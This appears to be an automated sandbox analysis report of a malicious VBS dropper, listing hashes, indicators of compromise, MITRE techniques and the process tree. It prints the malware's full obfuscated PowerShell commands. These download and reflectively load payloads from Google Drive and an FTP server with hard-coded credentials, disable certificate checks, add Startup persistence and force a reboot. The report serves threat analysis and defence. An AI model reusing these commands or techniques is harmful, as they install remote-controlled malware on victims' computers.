bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3

Reason

Machine shutdown

General

Target

#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs
Size

562KB
MD5

29234d373b3118d99da44ae211f227a5
SHA1

f084f4248be8e1e13e4c6ddf5388e7eafc4a6b4a
SHA256

bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3
SHA512

d434084bf1b635b527ac6b715a8a22202387699a522c759265f6e7f01e369cefeec62c87b582a2ad29711c7524af15c5d66b45cd038732cad44df3ab3e97c1f7
SSDEEP

1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFl:pP

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1808	powershell.exe
2380	powershell.exe
1812	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1808	powershell.exe
2380	powershell.exe
2952	powershell.exe
1812	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeShutdownPrivilege	2832	shutdown.exe
Token: SeRemoteShutdownPrivilege	2832	shutdown.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 1808	1948	WScript.exe	31
PID 1948 wrote to memory of 1808	1948	WScript.exe	31
PID 1948 wrote to memory of 1808	1948	WScript.exe	31
PID 1808 wrote to memory of 2380	1808	powershell.exe	33
PID 1808 wrote to memory of 2380	1808	powershell.exe	33
PID 1808 wrote to memory of 2380	1808	powershell.exe	33
PID 2380 wrote to memory of 2952	2380	powershell.exe	34
PID 2380 wrote to memory of 2952	2380	powershell.exe	34
PID 2380 wrote to memory of 2952	2380	powershell.exe	34
PID 2952 wrote to memory of 2996	2952	powershell.exe	35
PID 2952 wrote to memory of 2996	2952	powershell.exe	35
PID 2952 wrote to memory of 2996	2952	powershell.exe	35
PID 2380 wrote to memory of 1812	2380	powershell.exe	36
PID 2380 wrote to memory of 1812	2380	powershell.exe	36
PID 2380 wrote to memory of 1812	2380	powershell.exe	36
PID 2380 wrote to memory of 2832	2380	powershell.exe	37
PID 2380 wrote to memory of 2832	2380	powershell.exe	37
PID 2380 wrote to memory of 2832	2380	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбGUуかбdQByуかбHQуかбJwуかбgуかбCwуかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかбgуかбCwуかбIуかбуかбnуかбGgуかбdуかбB0уかбHуかбуかбcwуかб6уかбC8уかбLwBlуかбHYуかбaQByуかбHQуかбdQBhуかбGwуかбcwBlуかбHIуかбdgBpуかбGMуかбZQBzуかбHIуかбZQB2уかбGkуかбZQB3уかбHMуかбLgBjуかбG8уかбbQуかбvуかбHcуかбcуかбуかбtуかбGkуかбbgBjуかбGwуかбdQBkуかбGUуかбcwуかбvуかбGoуかбcwуかбvуかбGkуかбbgBnуかбC4уかбdуかбB4уかбHQуかбJwуかбgуかбCgуかбIуかбBdуかбF0уかбWwB0уかбGMуかбZQBqуかбGIуかбbwBbуかбCуかбуかбLуかбуかбgуかбGwуかбbуかбB1уかбG4уかбJуかбуかбgуかбCgуかбZQBrуかбG8уかбdgBuуかбEkуかбLgуかбpуかбCуかбуかбJwBJуかбFYуかбRgByуかбHуかбуかбJwуかбgуかбCgуかбZуかбBvуかбGgуかбdуかбBlуかбE0уかбdуかбBlуかбEcуかбLgуかбpуかбCcуかбMQBzуかбHMуかбYQBsуかбEMуかбLgуかбzуかбHkуかбcgBhуかбHIуかбYgBpуかбEwуかбcwBzуかбGEуかбbуかбBDуかбCcуかбKуかбBlуかбHуかбуかбeQBUуかбHQуかбZQBHуかбC4уかбKQуかбgуかбFoуかбYwBCуかбGMуかбYQуかбkуかбCуかбуかбKуかбBkуかбGEуかбbwBMуかбC4уかбbgBpуかбGEуかбbQBvуかбEQуかбdуかбBuуかбGUуかбcgByуかбHUуかбQwуかб6уかбDoуかбXQBuуかбGkуかбYQBtуかбG8уかбRуかбBwуかбHуかбуかбQQуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбOwуかбpуかбCуかбуかбKQуかбgуかбCcуかбQQуかбnуかбCуかбуかбLуかбуかбgуかбCcуかбkyE6уかбJMhJwуかбgуかбCgуかбZQBjуかбGEуかбbуかбBwуかбGUуかбUgуかбuуかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбDQуかбNgBlуかбHMуかбYQBCуかбG0уかбbwByуかбEYуかбOgуかб6уかбF0уかбdуかбByуかбGUуかбdgBuуかбG8уかбQwуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбWgBjуかбEIуかбYwBhуかбCQуかбIуかбBdуかбF0уかбWwBlуかбHQуかбeQBCуかбFsуかбOwуかбnуかбCUуかбSQBoуかбHEуかбUgBYуかбCUуかбJwуかбgуかбD0уかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかб7уかбCkуかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgBvуかбG0уかбcgBlуかбCQуかбIуかбуかб9уかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбCkуかбKуかбBlуかбHMуかбbwBwуかбHMуかбaQBkуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQуかбgуかбCcуかбdуかбB4уかбHQуかбLgуかбxуかбDуかбуかбTуかбBMуかбEQуかбLwуかбxуかбDуかбуかбLwByуかбGUуかбdуかбBwуかбHkуかбcgBjуかбHуかбуかбVQуかбvуかбHIуかбYgуかбuуかбG0уかбbwBjуかбC4уかбdуかбBhуかбHIуかбYgB2уかбGsуかбYwBzуかбGUуかбZуかбуかбuуかбHуかбуかбdуかбBmуかбEуかбуかбMQB0уかбGEуかбcgBiуかбHYуかбawBjуかбHMуかбZQBkуかбC8уかбLwуかб6уかбHуかбуかбdуかбBmуかбCcуかбIуかбуかбoуかбGcуかбbgBpуかбHIуかбdуかбBTуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG8уかбbQByуかбGUуかбJуかбуかбgуかбD0уかбIуかбBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбDsуかбKQуかбnуかбEуかбуかбQуかбBwуかбEoуかбOуかбуかб3уかбDUуかбMQуかбyуかбG8уかбcgBwуかбHIуかбZQBwуかбG8уかбbуかбBlуかбHYуかбZQBkуかбCcуかбLуかбуかбpуかбCkуかбOQуかб0уかбCwуかбNgуかбxуかбDEуかбLуかбуかб3уかбDkуかбLуかбуかб0уかбDEуかбMQуかбsуかбDgуかбOQуかбsуかбDgуかбMQуかбxуかбCwуかбNwуかбwуかбDEуかбLуかбуかб5уかбDkуかбLуかбуかб1уかбDEуかбMQуかбsуかбDEуかбMуかбуかбxуかбCwуかбMуかбуかбwуかбDEуかбKуかбBdуかбF0уかбWwByуかбGEуかбaуかбBjуかбFsуかбIуかбBuуかбGkуかбbwBqуかбC0уかбKуかбуかбoуかбGwуかбYQBpуかбHQуかбbgBlуかбGQуかбZQByуかбEMуかбawByуかбG8уかбdwB0уかбGUуかбTgуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбIуかбB0уかбGMуかбZQBqуかбGIуかбbwуかбtуかбHcуかбZQBuуかбCуかбуかбPQуかбgуかбHMуかбbуかбBhуかбGkуかбdуかбBuуかбGUуかбZуかбBlуかбHIуかбQwуかбuуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbwBtуかбHIуかбZQуかбkуかбDsуかбKQB0уかбG4уかбZQBpуかбGwуかбQwBiуかбGUуかбVwуかбuуかбHQуかбZQBOуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбE8уかбLQB3уかбGUуかбTgуかбoуかбCуかбуかбPQуかбgуかбG8уかбbQByуかбGUуかбJуかбуかб7уかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбOwуかбyуかбDEуかбcwBsуかбFQуかбOgуかб6уかбF0уかбZQBwуかбHkуかбVуかбBsуかбG8уかбYwBvуかбHQуかбbwByуかбFуかбуかбeQB0уかбGkуかбcgB1уかбGMуかбZQBTуかбC4уかбdуかбBlуかбE4уかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGwуかбbwBjуかбG8уかбdуかбBvуかбHIуかбUуかбB5уかбHQуかбaQByуかбHUуかбYwBlуかбFMуかбOgуかб6уかбF0уかбcgBlуかбGcуかбYQBuуかбGEуかбTQB0уかбG4уかбaQBvуかбFуかбуかбZQBjуかбGkуかбdgByуかбGUуかбUwуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかб7уかбH0уかбZQB1уかбHIуかбdуかбуかбkуかбHsуかбIуかбуかб9уかбCуかбуかбawBjуかбGEуかбYgBsуかбGwуかбYQBDуかбG4уかбbwBpуかбHQуかбYQBkуかбGkуかбbуかбBhуかбFYуかбZQB0уかбGEуかбYwBpуかбGYуかбaQB0уかбHIуかбZQBDуかбHIуかбZQB2уかбHIуかбZQBTуかбDoуかбOgBdуかбHIуかбZQBnуかбGEуかбbgBhуかбE0уかбdуかбBuуかбGkуかбbwBQуかбGUуかбYwBpуかбHYуかбcgBlуかбFMуかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかбgуかбGYуかбLwуかбgуかбDуかбуかбIуかбB0уかбC8уかбIуかбByуかбC8уかбIуかбBlуかбHgуかбZQуかбuуかбG4уかбdwBvуかбGQуかбdуかбB1уかбGgуかбcwуかбgуかбDsуかбJwуかбwуかбDgуかбMQуかбgуかбHуかбуかбZQBlуかбGwуかбcwуかбnуかбCуかбуかбZуかбBuуかбGEуかбbQBtуかбG8уかбYwуかбtуかбCуかбуかбZQB4уかбGUуかбLgBsуかбGwуかбZQBoуかбHMуかбcgBlуかбHcуかбbwBwуかбDsуかбIуかбBlуかбGMуかбcgBvуかбGYуかбLQуかбgуかбCkуかбIуかбуかбnуかбHуかбуかбdQB0уかбHIуかбYQB0уかбFMуかбXуかбBzуかбG0уかбYQByуかбGcуかбbwByуかбFуかбуかбXуかбB1уかбG4уかбZQBNуかбCуかбуかбdуかбByуかбGEуかбdуかбBTуかбFwуかбcwB3уかбG8уかбZуかбBuуかбGkуかбVwBcуかбHQуかбZgBvуかбHMуかбbwByуかбGMуかбaQBNуかбFwуかбZwBuуかбGkуかбbQBhуかбG8уかбUgBcуかбGEуかбdуかбBhуかбEQуかбcуかбBwуかбEEуかбXуかбуかбnуかбCуかбуかбKwуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбCуかбуかбKуかбуかбgуかбG4уかбbwBpуかбHQуかбYQBuуかбGkуかбdуかбBzуかбGUуかбRуかбуかбtуかбCуかбуかбJwуかбlуかбEkуかбaуかбBxуかбFIуかбWуかбуかбlуかбCcуかбIуかбBtуかбGUуかбdуかбBJуかбC0уかбeQBwуかбG8уかбQwуかбgуかбDsуかбIуかбB0уかбHIуかбYQB0уかбHMуかбZQByуかбG8уかбbgуかбvуかбCуかбуかбdуかбBlуかбGkуかбdQBxуかбC8уかбIуかбBHуかбGMуかбVwBpуかбFIуかбIуかбBlуかбHgуかбZQуかбuуかбGEуかбcwB1уかбHcуかбIуかбBlуかбHgуかбZQуかбuуかбGwуかбbуかбBlуかбGgуかбcwByуかбGUуかбdwBvуかбHуかбуかбIуかбуかб7уかбCkуかбJwB1уかбHMуかбbQуかбuуかбG4уかбaQB3уかбHуかбуかбVQBcуかбCcуかбIуかбуかбrуかбCуかбуかбTgBKуかбFQуかбeуかбBEуかбCQуかбKуかбуかбgуかбD0уかбIуかбBHуかбGMуかбVwBpуかбFIуかбOwуかбpуかбCуかбуかбZQBtуかбGEуかбTgByуかбGUуかбcwBVуかбDoуかбOgBdуかбHQуかбbgBlуかбG0уかбbgBvуかбHIуかбaQB2уかбG4уかбRQBbуかбCуかбуかбKwуかбgуかбCcуかбXуかбBzуかбHIуかбZQBzуかбFUуかбXуかбуかб6уかбEMуかбJwуかбoуかбCуかбуかбPQуかбgуかбFoуかбSwBuуかбFkуかбTQуかбkуかбDsуかбKQуかбnуかбHUуかбcwBtуかбC4уかбbgBpуかбHcуかбcуかбBVуかбFwуかбJwуかбgуかбCsуかбIуかбBOуかбEoуかбVуかбB4уかбEQуかбJуかбуかбgуかбCwуかбQgBLуかбEwуかбUgBVуかбCQуかбKуかбBlуかбGwуかбaQBGуかбGQуかбYQBvуかбGwуかбbgB3уかбG8уかбRуかбуかбuуかбG4уかбSgB5уかбFYуかбagуかбkуかбDsуかбOуかбBGуかбFQуかбVQуかб6уかбDoуかбXQBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgB0уかбHgуかбZQBUуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかбgуかбD0уかбIуかбBnуかбG4уかбaQBkуかбG8уかбYwBuуかбEUуかбLgBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбH0уかбOwуかбgуかбCkуかбJwB0уかбE8уかбTуかбBjуかбF8уかбSwBhуかбDMуかбWgBmуかбG8уかбWуかбуかбyуかбEoуかбSgByуかбFYуかбaуかбBtуかбFYуかбOQBjуかбG0уかбOQBYуかбHMуかбdQBYуかбG0уかбagуかбxуかбGcуかбMQуかбnуかбCуかбуかбKwуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбCgуかбIуかбуかб9уかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбewуかбgуかбGUуかбcwBsуかбGUуかбfQуかб7уかбCуかбуかбKQуかбnуかбDIуかбNуかбB1уかбFgуかбSgBUуかбHEуかбYQBtуかбGcуかбeQBNуかбHQуかбRgB6уかбGEуかбawBQуかбFIуかбMQBxуかбF8уかбSQB2уかбEcуかбaQBYуかбE4уかбZуかбBxуかбGEуかбTgуかбxуかбCcуかбIуかбуかбrуかбCуかбуかбbwB4уかбEsуかбVQBnуかбCQуかбKуかбуかбgуかбD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAFAAYgBuAEUAWgAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAFAAYgBuAEUAWgAkACAAOwA=';$kahlN = $qKKzc.replace('уかб' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs');powershell $vQpeD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$ermo.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $ermo.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ermo.dispose();$ermo = (New-Object Net.WebClient);$ermo.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ermo.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\#U6ce8#U6587#U4ed5#U69d8#U66f8.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.gni/sj/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe RiWcG /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2952
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" RiWcG /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1812
  - - C:\Windows\system32\shutdown.exe
      "C:\Windows\system32\shutdown.exe" /r /t 0 /f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2832

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1880

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
102f51947465082de0611f503794b7bd

SHA1
859045cee7442c0d3dbed85d85dbfb68f735f95d

SHA256
b658b7af35fb28db1df70760fdca1d589a7c6b79d7d6348eaababd19755ad607

SHA512
2728e29813fd9ea519ad3c85564dd669d05cd22377d742618252963bdb55f341b0fc0c7b50506e77aa16116faea2abc6106403f82cba63c4afca62587b844f6e

Download Submit
memory/1808-8-0x00000000028A0000-0x00000000028F0000-memory.dmp

Filesize
320KB

Download
memory/1808-13-0x00000000027C0000-0x00000000027C8000-memory.dmp

Filesize
32KB

Download
memory/1808-7-0x0000000002390000-0x00000000023A0000-memory.dmp

Filesize
64KB

Download
memory/1808-4-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1808-9-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/1808-12-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/1808-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/1808-10-0x00000000027B0000-0x00000000027BA000-memory.dmp

Filesize
40KB

Download
memory/1808-11-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/1808-15-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/1808-14-0x000000001B270000-0x000000001B2C8000-memory.dmp

Filesize
352KB

Download
memory/1808-5-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/1808-33-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/1808-34-0x000007FEF60BE000-0x000007FEF60BF000-memory.dmp

Filesize
4KB

Download
memory/1808-38-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

Errors